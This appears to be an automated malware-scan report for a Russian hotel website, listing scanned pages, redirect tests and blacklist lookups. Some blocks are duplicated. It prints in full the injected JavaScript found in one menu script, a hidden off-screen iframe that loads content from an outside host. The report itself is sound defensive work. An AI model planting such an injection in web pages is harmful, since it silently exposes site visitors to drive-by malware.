Scanned pages/files
Request | Server response | Status |
http://computeria-hotel.ru/ | 200 OK Content-Length: 300658 Content-Type: text/html | clean |
http://computeria-hotel.ru/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://computeria-hotel.ru/modules/mod_swmenufree/transmenu_Packed.js | 200 OK Content-Length: 190 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe style="position:fixed;left:-500px;top:0px;" height="127" width="127" src="http://eullsoe.dns-stuff.com/c721c49a3696c774f4133a7b3cbd4b97.eDaAPBJ?default"></iframe>'); Antivirus reports:
| ||
http://computeria-hotel.ru/index.php?option=com_content&view=section&id=4&Itemid=21 | 200 OK Content-Length: 300658 Content-Type: text/html | clean |
http://computeria-hotel.ru/index.php?option=com_content&view=article&id=21&Itemid=22 | 200 OK Content-Length: 35567 Content-Type: text/html | clean |
http://computeria-hotel.ru/index.php?option=com_content&view=article&id=51&Itemid=50 | 200 OK Content-Length: 30116 Content-Type: text/html | clean |
http://computeria-hotel.ru/index.php?option=com_content&view=article&id=42&Itemid=52 | 200 OK Content-Length: 32109 Content-Type: text/html | clean |
http://computeria-hotel.ru/index.php?option=com_wrapper&view=wrapper&Itemid=23 | 200 OK Content-Length: 29876 Content-Type: text/html | clean |
http://computeria-hotel.ru/index.php?option=com_phocagallery&view=categories&Itemid=46 | 200 OK Content-Length: 39943 Content-Type: text/html | clean |
http://computeria-hotel.ru/index.php?option=com_content&view=article&id=74&Itemid=56 | 200 OK Content-Length: 31762 Content-Type: text/html | clean |
http://computeria-hotel.ru/index.php?option=com_content&view=article&id=22&Itemid=27 | 200 OK Content-Length: 47381 Content-Type: text/html | clean |
http://computeria-hotel.ru/index.php?option=com_content&view=article&id=50&Itemid=49 | 200 OK Content-Length: 47765 Content-Type: text/html | clean |
http://computeria-hotel.ru/index.php?option=com_content&view=article&id=31&Itemid=35 | 200 OK Content-Length: 31311 Content-Type: text/html | clean |
http://computeria-hotel.ru/index.php?option=com_content&view=article&id=32&Itemid=34 | 200 OK Content-Length: 41987 Content-Type: text/html | clean |
http://computeria-hotel.ru/index.php?option=com_content&view=article&id=55&Itemid=51 | 200 OK Content-Length: 31710 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: computeria-hotel.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 16 Aug 2014 09:27:12 GMT
Pragma: no-cache
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 16 Aug 2014 09:27:13 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: fbf0dd0bdb14bc2aee65b43578167770=0gsupd0vnbadqfl1qmgmm1sdv6; path=/
X-Powered-By: PHP/5.3.10-1ubuntu3.13
GET / HTTP/1.1
Host: computeria-hotel.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 16 Aug 2014 09:27:12 GMT
Pragma: no-cache
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 16 Aug 2014 09:27:13 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: fbf0dd0bdb14bc2aee65b43578167770=0gsupd0vnbadqfl1qmgmm1sdv6; path=/
X-Powered-By: PHP/5.3.10-1ubuntu3.13
Second query (visit from search engine):
GET / HTTP/1.1
Host: computeria-hotel.ru
Referer: http://www.google.com/search?q=computeria-hotel.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: computeria-hotel.ru
Referer: http://www.google.com/search?q=computeria-hotel.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=computeria-hotel.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://computeria-hotel.ru/
Result: computeria-hotel.ru is not infected or malware details are not published yet.
Result: computeria-hotel.ru is not infected or malware details are not published yet.